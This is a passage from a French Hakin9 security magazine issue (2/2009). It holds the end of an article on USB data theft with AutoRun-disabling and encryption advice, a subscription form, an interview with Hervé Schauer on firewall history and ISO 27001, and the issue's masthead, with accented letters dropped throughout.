SYSTEM\CurrentControlSet\Services\ Cdrom Modifiez la chane AutoRun selon votre choix: tapez la valeur 1 pour activer l'AutoRun tapez la valeur 0 pour dsactiver l'AutoRun

Chiffrement et intgrit des informations contenues dans la cl

Il existe plusieurs solutions assurant l'intgrit et le chiffrement des donnes contenues sur les cls USB. Notons que les informations relatives l'intgrit ou au chiffrement ne doivent pas tre places sur la cl elle-mme:

Gestion de l'excution automatique dans votre rseau

En tant qu'administrateur, vous disposez de plusieurs faons de grer l'excution automatique travers votre rseau. Il est possible dempcher un utilisateur d'activer l'excution automatique sur les supports amovibles et les CD en modifiant

Conclusion

Pour conclure, nous pouvons donc dire qu'il est important de ne pas connecter sa cl usb sur n'importe quel ordinateur d'autant plus si elle possde des donnes confidentielles. Pensez crypter ses donnes et bien les effaces lorsque vous les supprimer de la cl. Seul les utilisateurs windows semble vraiment affects par ce problme, mais il s'agit du systme le plus reprsent; Donc attention!

Renard Nicolas

Figure 1. GonZor, Payload Config

78 HAKIN9 2/2009

Nicolas Renard certifi CISCO CCNA et Network Security, l'auteur est passionn par la scurit informatique depuis son enfance. Il souhaite travailler dans ce domaine. Pour contacter l'auteur : nicolas.renard@supinfo.com

76_77_78_usb_dumping.indd

78

2009-01-05, 18:27

BULLETIN DABONNEMENT
comment se dfendre
Merci de remplir ce bon de commande et de nous le retourner par fax : (+48) 22 244 24 59 ou par courrier : Software-Wydawnictwo Sp. z o.o., Bokserska 1, 02-682 Varsovie, Pologne Tl. (+33) 170 610 717 E-mail : abonnement@software.com.pl Yahoo Messenger : software_abonnement
Prnom/Nom ........................................................................................ Entreprise ............................................................................................. Adresse ................................................................................................. ................................................................................................................ Code postal .......................................................................................... Ville ........................................................................................................ Tlphone ............................................................................................. Fax ......................................................................................................... Je souhaite recevoir l'abonnement partir du numro .................... ................................................................................................................ En cadeau je souhaite recevoir ....................................................... ................................................................................................................ E-mail (indispensable pour envoyer la facture) ................................ ................................................................................................................

PRIX DABONNEMENT HAKIN9 COMMENT SE DFENDRE : 35

Je rgle par : Carte bancaire n CB

code CVC/CVV
expire le _______________ date et signature obligatoires

Abonnez-vous et recevez un cadeau !

type de carte (MasterCard/Visa/Diners Club/Polcard/ICB) Chque la ordre de : Software-Wydawnictwo Sp z o.o. Bokserska 1, 02-682 Varsovie Pologne Virement bancaire :
Nom banque : Socit Gnrale Chasse/Rhne banque guichet numro de compte cl Rib 30003 01353 00028010183 90 IBAN : FR76 30003 01353 00028010183 90 Adresse Swift (Code BIC) : SOGEFRPP

79_prenumerata.indd

79

2009-01-05, 18:28

INTERVIEW

Interview d'Herv Schauer

Herv Schauer, le pionnier de la scurit informatique en France, nous a accord un entretien exclusif.

Vous tes la principale figure de la scurit informatique en France. Racontez-nous votre histoire, comment tes-vous tomb dans la scurit, quand avez-vous commenc ? J'ai commenc au milieu des annes 80. Pendant que j'tais l'Universit, je croisais des pseudos-pirates. l'poque le rseau tait Transpac en X25 qui ne proposait que la fonction PAD, le telnet d'aujourd'hui, nous avions au bout principalement PrimeOS, VM/CMS et VMS, et puis avec les universits Unix BSD 4.2 au lieu de VMS sur les Vax de Digital et les premiers Unix commerciaux pour les serveurs minitel. J'ai crois encore plus de pirates quand j'ai mont une socit de serveurs minitel. C'tait l'poque des 3615 (minitel), et nous nous sommes faits pirater, mme si c'est une manire de parler. J'tais toujours l'universit et ma passion pour la scurit est venue de ma curiosit comprendre comment marchaient tous ces mcanismes et quelles erreurs de configuration, de programmation ou de conception permettaient ces intrusions. Les pirates de l'poque, eux, cherchaient gagner les concours qui permettaient de gagner des tls ou des voyages sur des 3615. En piratant le serveur minitel, ils avaient les rsultats des questions des concours, ou mieux ils mettaient directement leur nom en tte du fichier des gagnants. En 1987 a t lanc le groupe scurit de l'Association
80 HAKIN9 2/2009

Franaise des Utilisateurs d'Unix. J'y suis all et ma passion ne s'est pas modre depuis. Aujourd'hui c'est devenu l'OSSIR (Observatoire de la Scurit des Systmes d'Information et des Rseaux) (www.ossir.org) o je suis toujours animateur. 21 ans de scurit Unix ne me rajeunissent pas. J'ai lu aussi dans votre biographie que vous aviez invent le firewall? C'est vrai? HS: Oui et non, le filtrage IP a, lui, t invent en 1989 par la socit Network Systems de Minneapolis, sur un contrat de recherche de la DARPA, une agence amricaine de dfense qui finanait des projets de recherche. Beaucoup plus tard Network Systems a t rachete par StorageTek. Vous voyez encore aujourd'hui dans les sources des routeurs Cisco et Nortel (anciennement Bay Networks, anciennement Wellfleet), que le filtrage IP a t programm en 1991 dans leurs quipements. Il l'ont prsent au public en 1992, en mme temps que moi et mon collgue de l'poque Christophe Wolfhugel. Nous prsentions notre firewall appel garde-barrire (gatekeeper) l'poque avec nos relais telnet et FTP avec authentification des utilisateurs en coupure, et notre DNS priv/public. C'est grce un contrat de recherche avec le CNES (Agence franaise de l'espace) (www.cnes.fr) en 1991 que nous avons pu prsenter cette innovation.

Vous avez fait fortune alors? Pas du tout, nous n'avons dpos aucun brevet, nous avons publi et donn la communaut notre ide. Elle a t reprise dans l'ensemble des firewalls par la suite, DEC SEAL d'o vient aussi TIS FWTK et TIS Gauntlet, desquels viennent aussi Raptor. J'tais dans un groupe qui s'appelait logiciel du domaine public, nous constituions des bandes pour changer du logiciel, je n'avais pas l'esprit de la proprit intellectuelle mais plutt celui du partage. Qu'est devenu votre firewall? Il a trs vite t tendu de nombreux protocoles comme X11, puis a t commercialis par une socit franaise : Solsoft. Comme nous tions consultants, nous n'avions pas vocation dvelopper du logiciel commercial. Une partie du logiciel est devenu un logiciel de configuration de firewalls, appel Net Partitionner, dsormais commercialis par Exaprotect, il marche bien aux USA, et la partie relais a, elle, t publie en logiciel libre par Solsoft sous le nom NSM, puis elle a t reprise et elle est aujourd'hui supporte par la socit INL qui commercialise un firewall libre complet. Aprs cette aventure qu'avez-vous fait? C'tait la grande poque des audits de scurit et des tests d'intrusion. Nous

80_81_Wywiad.indd

80

2009-01-05, 20:00

INTERVIEW D'HERV SCHAUER

faisions des audits et du conseil et nous poursuivons toujours cette activit aujourd'hui. Les audits techniques et les tests d'intrusion sont notre coeur de mtier. Nous n'avons pas de limites, nous auditons la scurit aussi bien des rseaux industriels, que des grands rseaux d'oprateurs unifis. Nous ralisons des audits d'applications aussi bien dans le secteur embarqu, SCADA, que dans les architectures internet et propritaires. Bien sr, depuis cette poque, nous avons en plus dvelopp du conseil et de l'expertise sur les aspects organisationnels en scurit, autour des normes ISO 27001. Vous avez t un des tout premiers vous investir dans la norme ISO 27001 et un en faire la promotion, pourquoi? Oui, dans le monde francophone, c'est l'poque de la norme britannique BS7799 que nous avions t les premiers dire que l'approche tait la bonne, que le pragmatisme du systme de management tait ce qui manquait aux responsables scurit et que c'est l qu'il fallait aller. Donc, bien sr, quand la norme ISO 27001 est sortie en 2005, nous tions les premiers. Notre longue exprience dans les audits techniques nous avait dj montr, l'poque, que les mmes problmes reviennent perptuellement, et que les services scurit comme les services tudes ou la production informatique avaient de vritables difficults grer la scurit dans le temps. chaque fois qu'un client atteignait une bonne scurit elle ne tenait pas dans la dure, chaque audit technique nous devions recommander l'application des correctifs de scurit, qui existaient dj avant qu'Internet n'aide leur diffusion, et nous devions aussi recentrer les clients sur ce qui importe rellement pour leur direction. La construction d'un SMSI (Systme de Management de la Scurit de l'Information) est la meilleure rponse que nous ayons trouve, car cela impose l'amlioration continue et l'apprciation des risques. Vous faites aussi la promotion de la norme ISO 25005 sur ce sujet de la gestion de risques, pourquoi l-aussi ? Il y a des milliers de normes et seules quelques unes sont utiles un large public. Il n'est pas trs difficile de voir quelles sont celles qui rpondent un besoin. J'ai commenc dans la normalisation avec POSIX dans les annes 80 qui normalisait l'interface Unix. J'ai particip la cration de l'activit de normalisation en scurit de l'information en 1991. Donc, j'en ai vu passer des normes... Je savais qu'en devenant norme ISO 27005, la gestion de risque aurait du succs, tout comme en devenant ISO 27001 la norme britannique BS7799-2 ferait l'unanimit. Une norme se doit d'tre le consensus entre les points de vues des diffrents acteurs du march et des diffrents pays. La norme ISO 27005 est un exemple de norme synthtique et consensuelle, vous y retrouvez dedans un peu du EBIOS du gouvernement franais, un peu de la norme australienne, un peu de la norme britannique. De plus l'ISO 27005 est pratique et directement utilisable. Dans une socit internationale, plus besoin que chacun mette en avant sa mthode nationale, l'ISO 27005 facilite les changes et la comprhension mutuelle. Il tait facile de prvoir que le monde adopterait cette norme, et c'est pour cela que nous avons transform l'an dernier notre formation la gestion de risques en formation certifiante Information Security Risk Manager, sur la base de l'ISO 27005. Vos formations reprsentent quelle part de votre activit ? Entre 35% et 40%, ce sont les formations certifiantes ISO 27001 Lead Auditor et ISO 27001 Lead Implementer qui ont acclr le dveloppement de l'activit formation, mais les formations techniques marchent bien surtout celles avec des travaux pratiques comme la formation aux Tests d'Intrusions. En 3 ans, nous avons form plus de 500 personnes l'ISO 27001 en franais. Comment expliquez-vous le succs de vos formations ? La qualit : nos formateurs sont en premier lieu des consultants expriments. Ils sont l pour partager leur exprience et leur savoir-faire avec les stagiaires. Ils ne sont pas des formateurs la chane. Nous sommes aussi gnralement plusieurs instructeurs pour une mme formation, afin d'avoir un suivi de chaque stagiaire notamment durant les travaux dirigs. Nous essayons d'avoir le meilleur quilibre entre ce que contiennent les transparents et ce que les stagiaires doivent noter. J'attache beaucoup d'importance aux exercices et leurs corrections et au dveloppement des qualits pdagogiques des consultants. Ceux qui participent aux formations sont aussi des pdagogues ; ils aiment donner des formations et sont volontaires pour cela. Nous avons encore progress depuis que nous avons dvelopp notre e-learning. Sur quoi porte votre e-learning ? Pourquoi vous tes lanc dans cette activit ? Dans le prolongement des formations, il m'a sembl important d'avoir une offre complte. Nous avons un E-learning qui apprend programmer en PHP en toute scurit, et un qui explique l'ISO 27001 et les SMSI. Les dveloppeurs ont de plus en plus de difficults bnficier de formations. Je pense que le e-learning est une solution, et en entreprise les fraudes viennent de plus en plus d'applications web mal conues ou mal dveloppes. Pour l'ISO 27001 c'est la constatation que derrire un RSSI ou un responsable d'audit interne qui se forme une semaine chez nous, il y a de nombreuses personnes qui doivent juste comprendre les bases et ce public ne pourra pas se dplacer pour venir chez nous une journe ou une demi-journe. Le E-learning est alors la solution idale et la formation de toutes les personnes impliques dans un SMSI une obligation de la norme. Vous mettez disposition sur votre site normment de ressources. Vous avez aussi un engagement associatif important. Que vous apportent ces publications et cet engagement ? HS: J'ai toujours pens que l'on gagnait par le partage de l'information et non par la rtention d'informations. Quand nous avons fait une prsentation publique, il nous semble logique de mettre disposition les transparents plutt que de les garder confidentiels. Cela permet aussi que les gens nous connaissent. Dans le mme tat d'esprit je crois que les associations qui permettent de partager les expriences permettent un apport mutuel que tout un chacun devrait soutenir. Sur la scurit technique, j'anime le groupe OSSIR-Paris qui existe depuis 1987. Sur les normes ISO 27001, je co-anime le Club 27001 de Paris. Et HSC participe de nombreuses autres activits en scurit, en normalisation, sur la continuit d'activit, les fichiers nominatifs. http://www.hsc.fr
2/2009 HAKIN9 81

80_81_Wywiad.indd

81

2009-01-09, 11:41

ENle MAI numro Dans prochain

DOSSIER
SCURIT DES POSTES DE TRAVAIL MOBILES

Toute l'actualit du prochain numro sur le site www.hakin9.org/fr.

FEUILLETON
Un regard prcis et pertinent sur la scurit informatique.

SUR LE CD

Suite la lecture de ce dossier vous apprendrez comment assurer la protection des donnes sensibles dans votre entreprise. Larticle vous prsentera les enjeux les plus rcents ainsi que les mthodes de scurisation.

EN BREF

COMME TOUJOURS DANS CHAQUE NUMRO NOUS VOUS PROPOSONS HAKIN9.LIVE AVEC LA DISTRIBUTION BACKTRACK 3.

PRATIQUE
Cette rubrique vous permettra de connatre une mthode dattaque et dappliquer les moyens de dfense a mettre en place.

APPLICATIONS COMMERCIALES EN VERSIONS COMPLTES ET DES Lactualit du monde de la scurit informatique et des systmes dinformation. Les nouvelles failles, PROGRAMMES EN EXCLUSIVIT, POUR LA SCURIT, LA PROTECTION les intrusions web et les nouvelles applications. ET LA STABILIT DE VOTRE SYSTME.

FOCUS

DATA RECOVERY

DES TUTORIELS VIDO PRATIQUES AFIN DE MIEUX COMPRENDRE LES MTHODES OFFENSIVES.

CERTIFICATION CISSP

Cette fois-ci nous vous prsenterons tous les dtails importants sur la certification CISSP Certified Information Systems Security Professional. Nous vous invitons aussi la lecture des astuces pour russir sa certification.

Dans cette rubrique vous allez suivre les risques VOUS SOUHAITEZ COLLABORER lis aux donnes, de la cl USB au serveur, les LLABORATION DARTICLES ? risques de pertes, mais aussi de vol de donnes, les moyens de protections lis ces priphriques. NHSITEZ PAS NOUS CONTACTER!

FR@HAKIN9.ORG

Ce numro sera disponible en Mai La rdaction se rserve le droit de modifier le contenu de la revue.

Le bimensuel hakin9 est publi par Software-Wydawnictwo Sp. z o.o. Prsident de Software-Wydawnictwo Sp. z o.o. : Pawe Marciniak Directrice de la publication : Dominika Baran Rdactrice en chef : Dominika Baran dominika.baran@hakin9.org Fabrication : Marta Kurpiewska marta.kurpiewska@software.com.pl DTP : Marcin Zikowski Graphics & Design Studio e-mail : marcin@gdstudio.pl http://www.gdstudio.pl Couverture : Agnieszka Marchocka Couverture CD : ukasz Pabian Publicit : publicite@software.com.pl Abonnement : abonnement@software.com.pl Diffusion : Katarzyna Winiarz katarzyna.winiarz@software.com.pl Dpt lgal : parution ISSN : 1731-7037 Distribution : MLP Parc dactivits de Chesnes, 55 bd de la Noire BP 59 F - 38291 SAINT-QUENTIN-FALLAVIER CEDEX (c) 2009 Software-Wydawnictwo, tous les droits rservs

Bta-testeurs : Didier Sicchia, Ignace Kangni Kueviako, JF Albertini, Frdric Jean Bassaber, Yves Goux, Clment Facciolo, Grgory Carlet, Rudy Kommer, Anthony Foignant, Vincent le Toux Correction : Clmenet Quinton Les personnes intresses par la coopration sont invites nous contacter : fr@hakin9.org Prparation du CD : Rafal Kwany Imprimerie, photogravure : 101 Studio, Firma Tgi Ekonomiczna 30/36, 93-426 d Imprim en Pologne Adresse de correspondance : Software-Wydawnictwo Sp. z o.o. Bokserska 1, 02-682 Varsovie, Pologne Tl. +48 22 427 32 87, Fax. +48 22 244 24 59 www.hakin9.org Abonnement (France mtropolitaine, DOM/ TOM) : 1 an (soit 6 numros) 35 La rdaction fait tout son possible pour sassurer que les logiciels sont jour, elle dcline toute responsabilit pour leur utilisation.

Elle ne fournit pas de support technique li linstallation ou lutilisation des logiciels enregistrs sur le CD-ROM. Tous les logos et marques dposs sont la proprit de leurs propritaires respectifs. Pour crer les diagrammes on a utilis le programme

Le CD-ROM joint au magazine a t test avec AntiVirenKit de la socit G Data Software Sp. z o.o. La rdaction utilise le systme PAO AVERTISSEMENT Les techniques prsentes dans les articles ne peuvent tre utilises quau sein des rseaux internes. La rdaction du magazine nest pas responsable de lutilisation incorrecte des techniques prsentes. Lutilisation des techniques prsentes peut provoquer la perte des donnes !

La rdaction se rserve le droit de modifier le contenu de la revue

82_zajawka_ten-numer.indd 82 2009-01-09, 13:59

83_rekl_Tarusus.indd

2009-01-05, 18:30

84_rekl_Wallix.indd

2009-01-05, 18:31